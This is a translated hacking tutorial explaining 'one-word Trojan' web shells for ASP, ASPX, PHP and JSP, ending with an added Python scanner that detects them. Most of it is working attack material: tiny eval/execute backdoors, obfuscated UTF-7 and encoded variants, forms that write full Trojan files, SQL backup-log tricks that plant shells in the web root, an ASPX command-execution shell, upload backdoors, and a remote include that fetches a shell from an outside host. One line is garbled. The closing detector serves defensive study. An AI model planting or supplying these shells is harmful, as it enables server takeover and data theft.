The working principle of the Trojan horse

Source: Internet
Author: User
Tags: learn, php, string format, xpath

How a one-word Trojan works: analysis of the server side and the client side.

"One-word Trojan" server side (used together with a local HTML form that submits the script Trojan file)
This is the ASP statement we insert into an ASP file (not only into a database file that has the .asp suffix). When triggered, the statement receives the data the intruder submits through the client, executes it and completes the corresponding operation. The server-side code is <%execute request("value")%>, where value can be changed at will.

"One-word Trojan" client (submits to the ASP file on the remote server into which the one-word statement has been inserted)
Used to submit control data to the server; the submitted data makes up a complete ASP statement that the server executes, which is how the ASP Trojan file we need gets generated.

Conditions for using the one-word Trojan:

1. The server's Guest account has write access
2. The database address is known and the database format is ASA or ASP
3. If the database format is not ASP or ASA, being able to insert the statement into an ASP file also works

Assume that the statement <%execute request("value")%> is already in text.asp on the remote host. In ASP, <%execute .......%> means "execute the statement written in place of the ellipsis". So if we write in a carefully constructed statement, it will be executed for us too. We can therefore construct a form locally that reads as follows (// marks a comment):

<form action=http://host/path/text.asp method=post>
<textarea name=value cols=120 rows=10 width=45>
Set lp=server.createobject("Adodb.Stream")     // create a Stream object
lp.open                                        // open it
lp.type=2                                      // text mode
lp.charset="gb2312"                            // character set
lp.writetext request("newvalue")
lp.savetofile server.mappath("newmm.asp"),2    // write the Trojan content into the file newmm.asp; 2 means overwrite
lp.close                                       // close the object
set lp=nothing                                 // release the object
response.redirect "newmm.asp"                  // redirect to newmm.asp
</textarea>
<textarea name=newvalue cols=120 rows=10 width=45>Add the Trojan content here</textarea><BR>
<center><br><input type=submit value=submit>
</form>

The form submits its contents to text.asp on the remote host. Because text.asp contains the sentence <%execute request("value")%>, that code executes whatever content we sent from the form. (The form field name must be the same as the value in <%execute request("value")%>; those are the two places I marked in blue, and they must be equal.)

By now everyone should be clear. We constructed two form fields: the first holds the file-operation code (that is, the code that writes the contents of the second field into the current directory as an .asp file, here newmm.asp), and the second naturally holds the horse we want to write.

The following is the specific code:

Set lp=server.createobject("ADODB.Stream")     // create a Stream object
lp.open                                        // open it
lp.type=2                                      // text mode
lp.charset="gb2312"                            // character set
lp.writetext request("newvalue")
lp.savetofile server.mappath("newmm.asp"),2    // write the Trojan content into the file newmm.asp; 2 means overwrite
lp.close                                       // close the object
set lp=nothing                                 // release the object
response.redirect "newmm.asp"                  // redirect to newmm.asp

Here the name of the second form field must be the same as the newvalue in lp.writetext request("newvalue"); those are the two places I marked in red.
At this point, as long as the server grants write permission, the horse content submitted through your form is written into newmm.asp. That is, newmm.asp is our shell address.

About server errors:

Often a type mismatch error occurs when we add the one-word statement to an ASP file:

Script error detected at line 1. Source Line:execute Request ("Nettoo") Description: Type mismatch: ' Execute '


How do we solve this?
A good idea: as long as "execute" is replaced with "eval" on the server side, the error no longer occurs!
Alternatively, add a fault-tolerance statement to the one-word client connection; it can then be inserted into any ASP file without the error seen before:
<%on Error Resume Next Execute request ("value")%>

Common ASP one-word Trojan variants:

<%set ms = Server.CreateObject("MSScriptControl.ScriptControl.1")
ms.Language = "VBScript"
ms.AddObject "Response", Response
ms.AddObject "Request", Request
ms.AddObject "Session", Session
ms.AddObject "Server", Server
ms.AddObject "Application", Application
ms.ExecuteStatement("Ex" & "ecute(Request CHR)")%>


<%executeglobal request (CHR)%>

<%execute request ("#")%>

<%execute request (CHR)%>

<script language=vbscript runat=server>
if Request(CHR) <> "" Then ExecuteGlobal Request(Chr(35))
</script>

<%eval request ("#")%>

Inserted into a database:
┼ 攠 number 畣 爠 Huan enemy 瑳 ∨∣┩ 忾

A UTF-7 horse:
<%@ codepage=65000%>
<% Response. charset= "936"%>
<%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+aci-#+aci) +j-) +j-%>


<%@ LANGUAGE = Vbscript.encode%>
<%#@~^pgaaaa==r6p. ;! +/d ' 14dv&x#*@!@*erppd4+ p2xn^ed+vvg4cs,dn;! n/d ' ^4m ' &Xb*oBMAAA==^#~@%>


One-word Trojans in other environments:

ASPX

1. Equivalent of the ASP one-word Trojan:

Program code

ALTER DATABASE pubs SET RECOVERY FULL--
CREATE TABLE pubs.dbo.cmd (a image)
BACKUP LOG pubs TO DISK = 'c:/tm' WITH INIT
INSERT INTO pubs.dbo.cmd (a) VALUES ('<%@ Page language="C#" validaterequest="false"%><% System.IO.StreamWriter ow = new System.IO.StreamWriter(Server.MapPath("Images.aspx"), false); ow.Write(Request.Params["l"]); ow.Close(); %>')
BACKUP LOG pubs TO DISK = 'd:/test11.aspx'
This is the same as the ASP version: the client posts a variable l, and the Trojan code is carried inside l. This is the ASPX analogue of the ASP one-word Trojan.
mu.aspx.htm client (after posting, access: http://IP/images.aspx):

<form action=http://192.168.2.100/asp/mu.aspx method=post>
<b>Enter the big horse (full Trojan) content below:</b><br>
<textarea name=l cols=120 rows=35 width=45>
<%@ page language="VB" debug="true" %>
<%@ import namespace="System.IO" %>
<%@ import namespace="System.Diagnostics" %>
<script runat="server">
sub runcmd(src as object, e as eventargs)
    Dim myprocess as new Process()
    Dim myprocessstartinfo as new ProcessStartInfo(xpath.Text)
    myprocessstartinfo.UseShellExecute = false
    myprocessstartinfo.RedirectStandardOutput = true
    myprocess.StartInfo = myprocessstartinfo
    myprocessstartinfo.Arguments = xcmd.Text
    myprocess.Start()
    Dim mystreamreader as StreamReader = myprocess.StandardOutput
    Dim mystring as string = mystreamreader.ReadToEnd()
    myprocess.Close()
    mystring = Replace(mystring, "<", "&lt;")
    mystring = Replace(mystring, ">", "&gt;")
    result.Text = vbcrlf & "<pre>" & mystring & "</pre>"
end sub
</script>

2. The following is an asp.net file-upload program I found online, modified and trimmed; it can also be used:

Program code

DROP TABLE pubs.dbo.cmd
ALTER DATABASE pubs SET RECOVERY FULL
CREATE TABLE pubs.dbo.cmd (a image)
BACKUP LOG pubs TO DISK = 'c:/tm' WITH INIT
INSERT INTO pubs.dbo.cmd (a) VALUES ('<script language="C#" runat="server">private void BC(object o, EventArgs e) { string u = "files"; string filename; int pos = f.PostedFile.FileName.LastIndexOf("\\"); filename = f.PostedFile.FileName.Substring(pos + 1); f.PostedFile.SaveAs(Server.MapPath(u) + "\\" + filename); }</script><form method="POST" runat="server"><input type="file" id="f" runat="server"/><input type="submit" value="ss" runat="server"/></form>')
BACKUP LOG pubs TO DISK = 'c:/inetpub/wwwroot/test11.aspx'


PHP

There is nothing special about this article; it is just meant to start a discussion and to give friends who, like me, are beginners a way into PHP.
I have only been learning PHP for a few days and am eager to contribute, so if there are errors and omissions please point them out.
PHP's syntax is more powerful than ASP's: a single <?phpinfo();?> can spy on the configuration of the entire server. Running cmd, uploading files and so on are all very simple, and of the PHP Trojans in use today none is better than Angel's phpspy. Yesterday Hak_ban asked how to encrypt a PHP Trojan; I have not thought about that, but as for writing a miniature PHP Trojan, I think it would be hard for scanners to kill.
Here are a few functions that can be used as Trojans:

1. Several functions that can run external commands: system, passthru, exec, shell_exec, popen.
Example: saving <?system($cmd);?> as cmd.php is enough to run external commands. These functions can be said to be the first PHP Trojans, so virtual-host configurations generally block them as well.

2. Remember the WDB forum style.php hole? We can use the same idea to make a small Trojan that is hard to kill. As follows:

<?php include($include); ?>


Save it as 1.php; then we can call a PHP Trojan (such as phpspy.php) placed on another server that does not support PHP, to achieve our goal: http://target.com/1.php?include=http://www.xxx.com/phpspy.php
Here http://www.918x.com does not support PHP; otherwise phpspy.php would run on the http://www.xxx.com server instead of on the target server.

3. This is the very good upload Trojan that Angel gave us in the Discuz 2.2F attack; I did not change it:

<?copy($_FILES[myfile][tmp_name], $_FILES[myfile][name]);?>


After saving it as up.php, submit the form locally:

<form enctype="multipart/form-data" action="http://target server/up.php" method="POST"><input name="myfile" type="file"><input value="submit" type="submit"></form>


You can then upload a large PHP Trojan.

4. I had been wondering whether PHP has something like the Ice Fox Prodigal ASP Trojan, which runs through a locally submitted form. Finally I found the function: eval. Its syntax description in the PHP4 Chinese reference manual:
Syntax: void eval(string code_str);
Description: This function evaluates the value of a variable within a string; it is usually used when processing data from a database. The parameter code_str is the string to be processed. Note that the string to be processed must conform to PHP string format and end with a semicolon. The string processed by this function continues on from the end of the PHP program.

We can save <?eval($cmd);?> as a PHP file on the target host (I think it can be inserted into any PHP file). It then achieves the goal through a local form submission, but unlike ASP, when MAGIC_QUOTES_GPC = On many characters are filtered, which makes the usable functionality much smaller.

I have tried many times to write the form for this PHP Trojan and have no mature code yet; I also ask the masters for advice. When I have written it, I will give it to everyone. But there is no doubt that the eval function can make a miniature PHP Trojan.
PS: After writing this, someone told me that in fact the masters already have a miniature PHP Trojan, just not a public one. Hey, I am so depressed; what I studied, others already have results on. Anyway, I share my research with you and hope to get help and advice.


JSP

<% if (request.getParameter("f") != null) (new java.io.FileOutputStream(application.getRealPath("/") + request.getParameter("f"))).write(request.getParameter("t").getBytes()); %>


I don't think I need to explain this back door, but here is a hint: save it as 1.jsp and submit the URL

http://localhost/1.jsp?f=1.txt&t=hello

Then http://localhost/1.txt shows the content hello.
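To show the detection side of everything above in one place, here is an added Python example, written for this page and not part of the original article, that scans constructed sample files for the one-word Trojan forms listed in the ASP, ASPX, PHP and JSP sections: execute/eval of request data, the MSScriptControl and split-string variant, the code page 65000 (UTF-7) directive, Script Encoder markers, PHP eval/include/copy of user input, and the JSP parameter-driven file write. The sample bodies, rule names and regular expressions are constructed here; the UTF-7 sample follows the page's pattern but uses proper +ACI- sequences for the double quote.

```python
import re

# Constructed sample files in the shapes this page lists (not real captures);
# the UTF-7 one follows the page's pattern using proper +ACI- sequences for ".
SAMPLES = {
    "plain.asp": '<%execute request("value")%>',
    "split.asp": '<%set ms=Server.CreateObject("MSScriptControl.ScriptControl.1")\n'
                 'ms.ExecuteStatement("Ex" & "ecute(Request(chr(35)))")%>',
    "utf7.asp": '<%@ codepage=65000%><%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q'
                '+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI-)+j-)+j-%>',
    "encoded.asp": '<%@ LANGUAGE = VBScript.Encode%><%#@~^pgAAAA==...==^#~@%>',
    "shell.php": '<?php eval($cmd); ?>',
    "include.php": '<?php include($include); ?>',
    "up.php": '<?php copy($_FILES["myfile"]["tmp_name"], $_FILES["myfile"]["name"]); ?>',
    "writer.jsp": '<% new java.io.FileOutputStream(application.getRealPath("/") + '
                  'request.getParameter("f")).write(request.getParameter("t").getBytes()); %>',
    "clean.asp": '<% Response.Write "hello" %>',
    "clean.php": '<?php echo htmlspecialchars($_GET["q"]); ?>',
}

RULES = [  # (finding name, regex applied to the normalised, lower-cased text)
    ("asp-exec-request", r'\b(execute|executeglobal|eval)\s*\(?\s*request\s*\('),
    ("asp-scriptcontrol", r'msscriptcontrol\.scriptcontrol'),
    ("asp-utf7-codepage", r'<%@\s*codepage\s*=\s*65000'),
    ("asp-script-encode", r'language\s*=\s*vbscript\.encode|#@~\^'),
    ("php-eval-variable", r'\beval\s*\(\s*\$'),
    ("php-dynamic-include", r'\b(include|require)(_once)?\s*\(?\s*\$'),
    ("php-files-copy", r'\bcopy\s*\(\s*\$_files'),
    ("jsp-param-file-write", r'fileoutputstream\s*\(.*getparameter'),
]

def normalise(text):
    """Undo the obfuscations the page lists before the rules are applied."""
    low = text.lower()
    if re.search(r'<%@\s*codepage\s*=\s*65000', low):
        # ASP reads a page declared as code page 65000 as UTF-7, so decode it the
        # same way. A shift sequence with one base64 char (+j-) carries only six
        # bits, less than a UTF-16 unit, so it encodes nothing and is dropped.
        stripped = re.sub(r'\+[A-Za-z0-9+/]-', '', text)
        try:
            low = stripped.encode('ascii').decode('utf-7').lower()
        except UnicodeError:
            pass
    return re.sub(r'"\s*&\s*"', '', low)  # "Ex" & "ecute" -> "execute"

def scan(text):
    """Return the sorted finding names that match one file body."""
    norm = normalise(text)
    return sorted(name for name, pat in RULES if re.search(pat, norm))
```

Calling scan() on each SAMPLES entry flags every Trojan form and leaves the two clean files with an empty list; the same rules can be run over a real web root to find stray one-word files.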
